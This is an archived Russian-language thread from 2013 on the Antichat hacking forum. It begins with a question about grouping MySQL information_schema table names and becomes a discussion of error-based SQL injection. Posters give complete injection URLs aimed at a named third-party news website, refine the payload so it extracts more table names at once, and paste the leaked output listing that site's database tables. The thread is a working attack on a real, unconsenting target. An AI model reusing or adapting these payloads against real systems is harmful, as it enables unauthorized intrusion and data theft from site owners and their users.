ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
17.10.2013, 21:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
можно как-то в запросе select+group_concat(table_name) from information_schema.tables
групировать не все таблици а только 10 например??
|
|
|
|
17.10.2013, 22:49
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от qaz
qaz said:
можно как-то в запросе select+group_concat(table_name) from information_schema.tables
групировать не все таблици а только 10 например??
Можно, если место group_concat() использовать хотябы concat(). group_concat() c лимитами не работает!
|
|
|
17.10.2013, 23:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от winstrool
winstrool said:
Можно, если место group_concat() использовать хотябы concat(). group_concat() c лимитами не работает!
при запросе с concat() пишет, Subquery returns more than 1 row нужен другой вариант
|
|
|
|
17.10.2013, 23:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
15642
Репутация:
6
|
|
Сообщение от qaz
qaz said:
при запросе с concat() пишет, Subquery returns more than 1 row нужен другой вариант
Winstrool все правильно сказал!
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]mysql[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]select concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables limit 6[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]+---------------------------------------+
|[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"]) |
+---------------------------------------+
|[/COLOR][COLOR="#0000BB"]CHARACTER_SETS[/COLOR][COLOR="#007700"]|
|[/COLOR][COLOR="#0000BB"]COLLATIONS[/COLOR][COLOR="#007700"]|
|[/COLOR][COLOR="#0000BB"]COLLATION_CHARACTER_SET_APPLICABILITY[/COLOR][COLOR="#007700"]|
|[/COLOR][COLOR="#0000BB"]COLUMNS[/COLOR][COLOR="#007700"]|
|[/COLOR][COLOR="#0000BB"]COLUMN_PRIVILEGES[/COLOR][COLOR="#007700"]|
|[/COLOR][COLOR="#0000BB"]ENGINES[/COLOR][COLOR="#007700"]|
+---------------------------------------+
[/COLOR][COLOR="#0000BB"]6 rows in set[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0.01 sec[/COLOR][COLOR="#007700"])[/COLOR][/COLOR]
|
|
|
|
17.10.2013, 23:40
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от UXOR
UXOR said:
Winstrool все правильно сказал!
да не, не тот вариант ((
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//newsukraine.org.ua/idv.php?id=107%27+or+1+group+by+concat%28%28select+concat%28table_name%29%20from%20information_schema.tables%20limit%206%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR]
|
|
|
|
18.10.2013, 07:10
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от qaz
qaz said:
да не, не тот вариант ((
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//newsukraine.org.ua/idv.php?id=107%27+or+1+group+by+concat%28%28select+concat%28table_name%29%20from%20information_schema.tables%20limit%206%29,0x00,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+[/COLOR][/COLOR]
Уважаемый, помойму вы что то начинаите путать, вопервых сдесь вопросы по самой БД, а не по тому как крутить скули в еrror'e, во вторых для этого есть отдельная ветка где решаются подобные вопросы и вы об этом прекрасно знаите /thread46016.html, в третих, error выводит ограниченное колличество знаков, в результате чего по вашей просьбе вывести 10 табл не возможно, крутите по одной
Сообщение от None
http://newsukraine.org.ua/idv.php?id=107%27+or+1+group+by+concat%28%28select +concat%28table_name%29%20from%20information_schem a.tables%20limit%201,1%29,0x00,floor%28rand%280%29 *2%29%29having+min%280%29+or+1--+
|
|
|
|
18.10.2013, 11:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от winstrool
winstrool said:
Уважаемый, помойму вы что то начинаите путать, вопервых сдесь вопросы по самой БД, а не по тому как крутить скули в еrror'e, во вторых для этого есть отдельная ветка где решаются подобные вопросы и вы об этом прекрасно знаите /thread46016.html, в третих, error выводит ограниченное колличество знаков, в результате чего по вашей просьбе вывести 10 табл не возможно, крутите по одной
Согласен,что пост не в той теме, но qazзадал интересный вопрос.
Все правильно, в error существует ограничение на вывод, но все-таки возможен вывод более 1 таблицы.
Сообщение от None
www.newsukraine.org.ua/idv.php?id=107'+or+1+group+by+concat((select+
(insert(0x3a,1,0,insert(0x3a,1,0,table_name)))s from information_schema.tables group by s limit 20,1)
,0x00, floor(rand(0)*2))+having+min(0)+or+1+--+
Вывод:
Сообщение от None
Duplicate entry '
gorod
categ
typ
spam
site_ip
site
rassilka
pols
object
land
informer
gorod
c' for key 'group_key'
Как видим,что вывелось 12 таблиц
Запрос совсем костыльный, но работает. Так,что qaz, есть куда копать.
UPD
Если есть возможность, перенесите,пожалуйста, последние 7 постов в тему "Ваши вопросы по уязвимостям".
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
